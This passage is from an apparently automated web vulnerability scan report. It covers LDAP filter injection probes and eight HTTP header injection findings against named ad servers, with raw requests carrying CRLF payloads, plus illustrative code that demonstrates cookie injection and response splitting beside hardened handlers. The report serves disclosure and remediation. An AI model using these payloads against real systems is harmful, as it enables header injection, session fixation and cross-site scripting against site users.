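            raise ValueError("trailing data at offset %d" % self.i)
        return node

    def _peek(self) -> str:
        return self.s[self.i] if self.i < len(self.s) else ""

    def _expect(self, ch: str) -> None:
        if self._peek() != ch:
            raise ValueError("expected %r at offset %d" % (ch, self.i))
        self.i += 1

    def _filter(self) -> Node:
        self._expect("(")
        c = self._peek()
        if c in ("&", "|"):                       # and / or: zero or more children
            self.i += 1
            children = []
            while self._peek() == "(":
                children.append(self._filter())
            node = (c, children)
        elif c == "!":                            # not: exactly one child
            self.i += 1
            node = ("!", [self._filter()])
        else:                                     # simple item, value runs to ')'
            m = _ITEM.match(self.s, self.i)
            if m is None:
                raise ValueError("bad filter item at offset %d" % self.i)
            close = self.s.find(")", m.end())
            if close < 0:
                raise ValueError("unterminated filter item")
            node = ("item", self.s[self.i:close])
            self.i = close
        self._expect(")")
        return node


def count_assertions(filter_text: str) -> Optional[int]:
    """Number of attribute assertions in a parsed filter, or None when the
    filter does not parse. Injection shows up as a changed count (or None)
    relative to the baseline built from a benign value."""
    try:
        root = FilterParser(filter_text).parse()
    except ValueError:
        return None
    stack: List[Node] = [root]
    count = 0
    while stack:
        kind, payload = stack.pop()
        if kind == "item":
            count += 1
        else:
            stack.extend(payload)
    return count


if __name__ == "__main__":
    for probe in ("*)(sn=*", "*)!(sn=*"):
        print(probe, count_assertions(build_filter_unsafe(probe)),
              count_assertions(build_filter_safe(probe)))
```

With plain interpolation the first probe yields a filter with three assertions instead of two and the second yields a filter that does not parse at all; after escaping, both probes produce exactly the two-assertion baseline. count_assertions applied to your own filter builder is the unit test that catches this class of defect: every hostile value must give the same count as a benign one.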

3. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, the data should be strictly validated to prevent header injection. In most situations it is appropriate to allow only short alphanumeric strings to be copied into headers and to reject any other input. At a minimum, input containing any character with an ASCII code below 0x20 must be rejected; this covers CR (0x0d) and LF (0x0a), the pair that the %0d%0a payloads in the findings below rely on. The check must run on the decoded value: the payloads arrive percent-encoded, and the captured responses show that the server decodes them before building the header.
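The mechanism described above, as an added example that is not code from the ad servers in this report or from its author: a redirect handler that copies a request value into Location, first in the unsafe form behind findings 3.1 and 3.2, then hardened as the remediation describes, plus the header parser a browser or proxy effectively applies. The host name, the endpoint path and the d8084-style payloads are constructed for illustration.

```python
"""Added example (not code from the sites in this report or from its author):
an unsafe redirect beside its hardened form, and a parser that shows what a
client sees. Host name, path and payloads are constructed."""
import re
from typing import List, Tuple
from urllib.parse import unquote

CRLF = "\r\n"
BASE = "http://ad.example.net/activity;"   # assumed redirect target prefix


def unsafe_redirect(raw_param: str) -> str:
    """Percent-decodes the value and writes it straight into Location.
    %0d%0a in the input becomes a real CRLF inside the header block, which
    is what the captured responses in 3.1 and 3.2 show."""
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: " + BASE + unquote(raw_param) + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


class HeaderInjectionError(ValueError):
    """Raised when a value is not safe to place in a response header."""


# Remediation from the report: allow only short alphanumeric strings and
# reject everything else, in particular any byte below 0x20.
_TOKEN = re.compile(r"^[A-Za-z0-9]{1,64}$")


def validate_header_token(raw_param: str) -> str:
    """Decode first, then validate; validating the still-encoded form would
    let %0d%0a through and the decoder would re-create the line break."""
    value = unquote(raw_param)
    if any(ord(ch) < 0x20 for ch in value):
        raise HeaderInjectionError("control character in header value")
    if not _TOKEN.match(value):
        raise HeaderInjectionError("value is not a short alphanumeric token")
    return value


def safe_redirect(raw_param: str) -> str:
    """Same response, but the value is validated before it reaches the header."""
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: " + BASE + validate_header_token(raw_param) + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def parse_headers(response: str) -> List[Tuple[str, str]]:
    """Split the header block the way a browser or caching proxy does: one
    header per CRLF-terminated line, up to the first empty line. Lines
    without a colon are returned with an empty name so they stay visible."""
    head = response.split(CRLF + CRLF, 1)[0]
    pairs = []
    for line in head.split(CRLF)[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        pairs.append((name.strip(), value.strip()) if sep else ("", line))
    return pairs


def response_body(response: str) -> str:
    """Everything after the first empty line, i.e. what the client renders."""
    parts = response.split(CRLF + CRLF, 1)
    return parts[1] if len(parts) == 2 else ""


def injected_headers(response: str, expected: set) -> List[str]:
    """Header names present in the response that the handler never set."""
    return [name for name, _ in parse_headers(response) if name not in expected]


if __name__ == "__main__":
    # Constructed payloads in the style of the report's d8084%0d%0a... probe.
    cookie_probe = "d8084%0d%0aSet-Cookie:%20sid=attacker"
    body_probe = "d8084%0d%0a%0d%0a<script>alert(1)</script>"
    print(injected_headers(unsafe_redirect(cookie_probe), {"Location", "Content-Length"}))
    print(response_body(unsafe_redirect(body_probe))[:25])
    try:
        safe_redirect(cookie_probe)
    except HeaderInjectionError as err:
        print("rejected:", err)
```

The first probe adds a Set-Cookie header the handler never sent; the second, with a doubled CRLF, ends the header block early and places attacker-controlled markup in the body, which is the response-splitting case the background text describes. The hardened handler rejects both before anything is written.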


3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d8084%0d%0a6b4a93a16b2 was submitted in the REST URL parameter 1. The server decoded %0d%0a into a literal CRLF, so the captured response carries the Location header split across three lines, with 6b4a93a16b2 appearing as a header line of its own: an injected HTTP header.

Request

GET /d8084%0d%0a6b4a93a16b2;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682?&_dc_ck=try HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/d8084
6b4a93a16b2
;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682:
Date: Sat, 14 May 2011 10:09:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/activity [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 90707%0d%0a1e0827f149 was submitted in the src parameter. The server decoded %0d%0a into a literal CRLF, so the captured response carries the Location header split across three lines, with 1e0827f149 appearing as a header line of its own: an injected HTTP header.

Request

GET /activity;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682?90707%0d%0a1e0827f149 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682?90707
1e0827f149
&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 14 May 2011 10:24:37 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 14 May 2011 10:09:37 GMT
Server: GFE/2.0
Content-Type: text/html


3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload abf61%0d%0a3eb55aa738 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4891372~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~898~0~01020^ebAboveTheFoldDuration~898~0~01020&OptOut=0&ebRandom=0.4370704125612974&flv=abf61%0d%0a3eb55aa738&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com//static_html_files/addineyeV2.html?strBanner=gEbServerData%3D%271%3A%3A2284375%3A%3A4891372%3A%3ASite-32928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A139650%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3ASite-30079/Type-20/5198415/d664f754-eb5c-4f36-91a8-9e92f15fb72f/%3A%3A%27%3BgEbBannerData%3D%278157523402478546%3A%3A1%3A%3A336%3A%3A280%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3Afalse%27%3BgEbInteractions%3D%27%5B_eyeblaster%2Chttp%253A//ad.doubleclick.net/click%253Bh%253Dv8/3b07/3/0/*/n%253B239950972%253B0-0%253B0%253B46249204%253B4252-336/280%253B41839080/41856867/1%253B%253B%257Eokv%253D%253B%2521category%253D%253Bpage%253Drightrail%253Bmsrc%253DBOL_other_tnav_analysis%253Bbiz%253D1053%253B%253Bs%253D8_10001%253Bmc%253D0%253Btile%253D9%253Bsz%253D300x250%252C336x280%252C300x600%252C336x850%253B%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253F%2C%5D%27%3BebSrc%3D%27http%253A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_2_2_11.js%27%3BebResourcePath%3D%27http%253A//ds.serving-sys.com/BurstingRes//%27%3B%3BebO%3Dnew%20Object%28%29%3BebO.sms%3D%27ds.serving-sys.com/BurstingScript/%27%3BebO.bs%3D%27bs.serving-sys.com%27%3BebO.fvp%3D%27Res/%27%3BebO.rpv%3D%27_2_5_1%27%3BebO.pv%3D%27_4_5_0%27%3BebO.pi%3D0%3BebO.wv%3D%27_3_0_1%27%3BebPtcl%3D%27http%3A//%27%3BebO.bt%3D5%3BebO.bv%3D11%3BebO.plt%3D9%3BgEbDbgLvl%3D0%3BgnEbLowBWLimit%3D120%3BgnEbMinZIndex%20%3D39%3BgEbURLTokens%20=%20'tp_PlacementID%3D2284375%24%24tp_AdID%3D4891372%24%24';
Origin: http://online.barrons.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=c71f4c38-04bb-446e-a6ab-b7ecdb44dadd3I4070; expires=Fri, 12-Aug-2011 06:59:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=abf61
3eb55aa738
&RES=128&WMPV=0; expires=Fri, 12-Aug-2011 06: 59:47 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:59:46 GMT
Connection: close
Content-Length: 0


3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 7aee8%0d%0a2a120855db7 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4891372~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~898~0~01020^ebAboveTheFoldDuration~898~0~01020&OptOut=0&ebRandom=0.4370704125612974&flv=10.3181&wmpv=0&res=7aee8%0d%0a2a120855db7 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com//static_html_files/addineyeV2.html?strBanner=gEbServerData%3D%271%3A%3A2284375%3A%3A4891372%3A%3ASite-32928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A139650%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3ASite-30079/Type-20/5198415/d664f754-eb5c-4f36-91a8-9e92f15fb72f/%3A%3A%27%3BgEbBannerData%3D%278157523402478546%3A%3A1%3A%3A336%3A%3A280%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3Afalse%27%3BgEbInteractions%3D%27%5B_eyeblaster%2Chttp%253A//ad.doubleclick.net/click%253Bh%253Dv8/3b07/3/0/*/n%253B239950972%253B0-0%253B0%253B46249204%253B4252-336/280%253B41839080/41856867/1%253B%253B%257Eokv%253D%253B%2521category%253D%253Bpage%253Drightrail%253Bmsrc%253DBOL_other_tnav_analysis%253Bbiz%253D1053%253B%253Bs%253D8_10001%253Bmc%253D0%253Btile%253D9%253Bsz%253D300x250%252C336x280%252C300x600%252C336x850%253B%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253F%2C%5D%27%3BebSrc%3D%27http%253A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_2_2_11.js%27%3BebResourcePath%3D%27http%253A//ds.serving-sys.com/BurstingRes//%27%3B%3BebO%3Dnew%20Object%28%29%3BebO.sms%3D%27ds.serving-sys.com/BurstingScript/%27%3BebO.bs%3D%27bs.serving-sys.com%27%3BebO.fvp%3D%27Res/%27%3BebO.rpv%3D%27_2_5_1%27%3BebO.pv%3D%27_4_5_0%27%3BebO.pi%3D0%3BebO.wv%3D%27_3_0_1%27%3BebPtcl%3D%27http%3A//%27%3BebO.bt%3D5%3BebO.bv%3D11%3BebO.plt%3D9%3BgEbDbgLvl%3D0%3BgnEbLowBWLimit%3D120%3BgnEbMinZIndex%20%3D39%3BgEbURLTokens%20=%20'tp_PlacementID%3D2284375%24%24tp_AdID%3D4891372%24%24';
Origin: http://online.barrons.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=5659a0b2-55df-46f4-905c-1fd6fa8ca69b3I4060; expires=Fri, 12-Aug-2011 06:59:48 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=7aee8
2a120855db7
&WMPV=0; expires=Fri, 12-Aug-2011 06: 59:48 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:59:48 GMT
Connection: close
Content-Length: 0


3.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 81dd8%0d%0a96cba21421f was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4891372~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~898~0~01020^ebAboveTheFoldDuration~898~0~01020&OptOut=0&ebRandom=0.4370704125612974&flv=10.3181&wmpv=81dd8%0d%0a96cba21421f&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com//static_html_files/addineyeV2.html?strBanner=gEbServerData%3D%271%3A%3A2284375%3A%3A4891372%3A%3ASite-32928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A139650%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3ASite-30079/Type-20/5198415/d664f754-eb5c-4f36-91a8-9e92f15fb72f/%3A%3A%27%3BgEbBannerData%3D%278157523402478546%3A%3A1%3A%3A336%3A%3A280%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3Afalse%27%3BgEbInteractions%3D%27%5B_eyeblaster%2Chttp%253A//ad.doubleclick.net/click%253Bh%253Dv8/3b07/3/0/*/n%253B239950972%253B0-0%253B0%253B46249204%253B4252-336/280%253B41839080/41856867/1%253B%253B%257Eokv%253D%253B%2521category%253D%253Bpage%253Drightrail%253Bmsrc%253DBOL_other_tnav_analysis%253Bbiz%253D1053%253B%253Bs%253D8_10001%253Bmc%253D0%253Btile%253D9%253Bsz%253D300x250%252C336x280%252C300x600%252C336x850%253B%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253F%2C%5D%27%3BebSrc%3D%27http%253A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_2_2_11.js%27%3BebResourcePath%3D%27http%253A//ds.serving-sys.com/BurstingRes//%27%3B%3BebO%3Dnew%20Object%28%29%3BebO.sms%3D%27ds.serving-sys.com/BurstingScript/%27%3BebO.bs%3D%27bs.serving-sys.com%27%3BebO.fvp%3D%27Res/%27%3BebO.rpv%3D%27_2_5_1%27%3BebO.pv%3D%27_4_5_0%27%3BebO.pi%3D0%3BebO.wv%3D%27_3_0_1%27%3BebPtcl%3D%27http%3A//%27%3BebO.bt%3D5%3BebO.bv%3D11%3BebO.plt%3D9%3BgEbDbgLvl%3D0%3BgnEbLowBWLimit%3D120%3BgnEbMinZIndex%20%3D39%3BgEbURLTokens%20=%20'tp_PlacementID%3D2284375%24%24tp_AdID%3D4891372%24%24';
Origin: http://online.barrons.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d2b610ab-8d3c-4daa-92a7-ae8bf8a9afd63I4010; expires=Fri, 12-Aug-2011 06:59:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=81dd8
96cba21421f
; expires=Fri, 12-Aug-2011 06: 59:47 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:59:47 GMT
Connection: close
Content-Length: 0


3.6. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/13754-86576-1281-0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a602b%0d%0a7429e651919 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a602b%0d%0a7429e651919/js/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 10:12:39 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-60407-1305367959401-0u; domain=.apmebf.com; path=/; expires=Mon, 13-May-2013 10:12:39 GMT
Location: http://altfarm.mediaplex.com/a602b
7429e651919
/js/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&no_cj_c=1&upsid=182017413646
Content-Length: 583
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/a602b
7429e651919
...[SNIP]...

3.7. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/13754-86576-1281-0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ee78b%0d%0ae1dd2be16ff was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ad/ee78b%0d%0ae1dd2be16ff/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 10:12:39 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-39912-1305367959598-cr; domain=.apmebf.com; path=/; expires=Mon, 13-May-2013 10:12:39 GMT
Location: http://altfarm.mediaplex.com/ad/ee78b
e1dd2be16ff
/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&no_cj_c=1&upsid=078282788346
Content-Length: 583
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ee78b
e1dd2be1
...[SNIP]...

3.8. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/13754-86576-1281-0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3a7d1%0d%0a5031ae02666 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ad/js/3a7d1%0d%0a5031ae02666?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 10:12:39 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-55768-1305367959801-72; domain=.apmebf.com; path=/; expires=Mon, 13-May-2013 10:12:39 GMT
Location: http://altfarm.mediaplex.com/ad/js/3a7d1
5031ae02666
?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&no_cj_c=1&upsid=294035646314
Content-Length: 567
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/3a7d1
5031a
...[SNIP]...

4. Cross-site scripting (reflected)
There are 130 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

